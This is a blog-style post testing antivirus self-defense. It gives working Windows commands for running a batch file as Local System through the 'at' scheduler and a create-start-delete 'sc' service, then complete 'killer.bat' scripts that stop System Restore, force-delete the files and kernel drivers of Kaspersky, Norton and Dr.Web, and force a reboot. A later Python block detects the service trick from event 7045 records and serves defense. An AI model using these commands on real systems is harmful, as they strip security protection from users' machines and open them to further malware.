Hello to all! Recently we discussed the power of the heuristic technologies in modern antiviruses and came to the conclusion that nobody can be trusted. Sometimes not even myself :)
Today we will talk about another controversial aspect of antivirus software: self-defense. Some vendors take this very seriously, and their products hold up even in complex cases of active infection, effectively removing the malware's hooks, installing themselves into the system and then deleting the entrenched malware. Others believe that fighting an active infection is tilting at windmills that leads nowhere worthwhile, and therefore: LiveCD, and in some cases format c: :)
Let us give both sides their due: of course, if it is possible to win a fight against an active infection, that is good, as long as it does not lead to BSODs and a system that will not boot for a couple of days. And it is quite obvious that with a serious, complex infection it is often impossible to break through the active mass of hooks, kernel-level malicious processes and the like, so it is often more reasonable to disinfect the inactive system (from a LiveCD, or by scanning the hard drive on a clean machine), and in the case of a file-infecting virus, to consider a complete reinstall of the OS.
But let's not get into that argument; we'll leave it for the next article :) Let's talk about something simple: antivirus self-defense on a system that is known to be clean. We take as given:
1) a combined product is installed: antivirus + HIPS + firewall;
2) the system was not infected, but malicious code somehow got in;
3) the malicious code intends to remove the antivirus, or damage it enough to make it completely inoperable.
The course of action will be the simplest one: an attempt to delete vital antivirus files with Local System rights. The idea belongs to my good friend Alexey Baranov, who reported it in closed circles some time ago. Time has passed; we will assume the vendors have tightened things up. Let's check.
On Windows systems where the user works as an administrator (probably 80% of all systems), getting Local System rights is quite simple. Two ways, well described on the net, immediately come to mind.
Method 1. Using the scheduler. By default, the Task Scheduler service runs on all Windows systems, and it runs its tasks with the Local System rights we need. Then all it takes is to add a task in some way:
at 11:05 c:\killer.bat
and killer.bat will run as Local System.
The advantages are obvious: everything is simple and clear. Disadvantage: the user may notice a strange new task in the scheduler, or may simply have disabled this service for security reasons.
Method 2. Creating a service. The essence of the method is to create a service, start it and delete it. Everything is done in three lines:
sc create CmdAsSystem type= own type= interact binPath= "cmd /c start /low /b cmd /c (c:\killer.bat)"
net start CmdAsSystem
sc delete CmdAsSystem
At the same time, not only will killer.bat run with IDLE priority, it will also run on behalf of Local System.
The method is invisible; it does not show itself anywhere.
At the time of publication, KIS 2010 let both methods through at the HIPS level, without even asking for any permissions.
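For the defending side, Method 2 does leave a footprint: on Windows Vista and later the Service Control Manager records every service installation in the System log as event 7045, including the service name, the image path exactly as given to sc create, and the account. The following check is an added example and not part of the original post; its records are constructed to mirror the 7045 fields (the field names are simplified), and every service except CmdAsSystem, whose image path is the one from the post, is a made-up illustration.

```python
import re

# Constructed sample records modelled on Windows System log event 7045
# ("A service was installed in the system"). Not real log exports: names and
# paths are made up, except the first image path, taken from the post.
SAMPLE_7045 = [
    {"ServiceName": "CmdAsSystem",
     "ImagePath": "cmd /c start /low /b cmd /c (c:\\killer.bat)",
     "ServiceType": "user mode service", "StartType": "demand start",
     "AccountName": "LocalSystem"},
    {"ServiceName": "ExampleUpdater",            # hypothetical benign service
     "ImagePath": "\"C:\\Program Files\\Example\\updater.exe\" /svc",
     "ServiceType": "user mode service", "StartType": "auto start",
     "AccountName": "LocalSystem"},
    {"ServiceName": "ExampleHelper",             # hypothetical, script-based
     "ImagePath": "wscript.exe C:\\Temp\\helper.vbs",
     "ServiceType": "user mode service", "StartType": "auto start",
     "AccountName": "NT AUTHORITY\\LocalService"},
]

# A service whose image path is a command interpreter or a script file is the
# hallmark of the "create, start, delete" trick: genuine services are compiled
# executables that talk to the service controller themselves.
INTERPRETER = re.compile(r'(^|[\\\s"])(cmd|wscript|cscript|powershell)(\.exe)?(["\s]|$)', re.I)
SCRIPT_FILE = re.compile(r'\.(bat|cmd|vbs|js|ps1)\b', re.I)

def suspicious_service(rec):
    """Return the reasons a 7045 record looks like an interpreter-backed service."""
    reasons = []
    path = rec["ImagePath"]
    if INTERPRETER.search(path):
        reasons.append("image path invokes a command interpreter")
    if SCRIPT_FILE.search(path):
        reasons.append("image path references a script file")
    # sc create defaults to demand start under LocalSystem; together with an
    # interpreter image path that is a one-shot SYSTEM launcher, not a service.
    if reasons and rec["AccountName"] == "LocalSystem" and rec["StartType"] == "demand start":
        reasons.append("demand-start LocalSystem service with interpreter image path")
    return reasons

def scan(records):
    """Map service name -> reasons, for every record that raised at least one."""
    hits = {}
    for rec in records:
        reasons = suspicious_service(rec)
        if reasons:
            hits[rec["ServiceName"]] = reasons
    return hits
```

The same image-path test applies to the service binary seen at 7045 time by a HIPS, which is the point at which the products below should have asked.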
Now let's move on to killer.bat itself (in our case it sits in the root of drive C, but obviously it can be dropped anywhere).
The essence of this file is simple: delete everything that belongs to the antivirus. So, for Kaspersky 2010 it is:
net stop srservice
erase /F /S /Q "C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 2010"
erase /F /S /Q "%windir%\system32\drivers\kl1.sys"
erase /F /S /Q "%windir%\system32\drivers\klif.sys"
erase /F /S /Q "%windir%\system32\drivers\klbg.sys"
erase /F /S /Q "%windir%\system32\drivers\klim5.sys"
erase /F /S /Q "%windir%\system32\drivers\klmd.sys"
erase /F /S /Q "%windir%\system32\drivers\klmouflt.sys"
shutdown -r -f -c "Bye-Bye!!!"
For Symantec, something like this (whoever knows better, correct me; I am on Kaspersky myself):
net stop srservice
erase /F /S /Q "C:\Program Files\Symantec"
erase /F /S /Q "C:\Program Files\Norton Internet Security"
shutdown -r -f -c "Bye-Bye!!!"
For Doctor Web:
net stop srservice
erase /F /S /Q "C:\Program Files\DrWeb"
erase /F /S /Q "%windir%\system32\drivers\dwprot.sys"
erase /F /S /Q "%windir%\system32\drivers\drwebaf.sys"
erase /F /S /Q "%windir%\system32\drivers\DrWebPF.sys"
erase /F /S /Q "%windir%\system32\drivers\spiderg3.sys"
shutdown -r -f -c "Bye-Bye!!!"
And so on. The first line stops the Windows System Restore service, just in case :)
Clearly a similar script can be written for any antivirus; the only thing that changes is the paths to the vital files.
So, what do we have?
1. KIS 2010 took such damage that it was killed and the system was left without protection. KIS 2011 is free of this weakness, but it is still a beta...
2. NIS lost several files but kept working; the files were later downloaded again and restored during an update from the Internet.
3. DrWeb did not suffer at all, as expected given the developer's special emphasis on countering active infection. But do not forget that there is SpiDie for the Web...
At the same time, the HIPS of all the above products quietly let both variants of the manipulation through (I checked personally).
FINDINGS
Unfortunately, we have to admit that some of the existing antivirus solutions have weaknesses that can be used to damage the protection and effectively remove the antivirus from the computer.
I invite readers to add their observations and tests of other antivirus products in the comments (preferably ones with HIPS, to assess how well the actions for obtaining Local System rights are blocked). I think the described manipulations are clear and can easily be reproduced by enthusiasts in virtual machines.
Cheers! 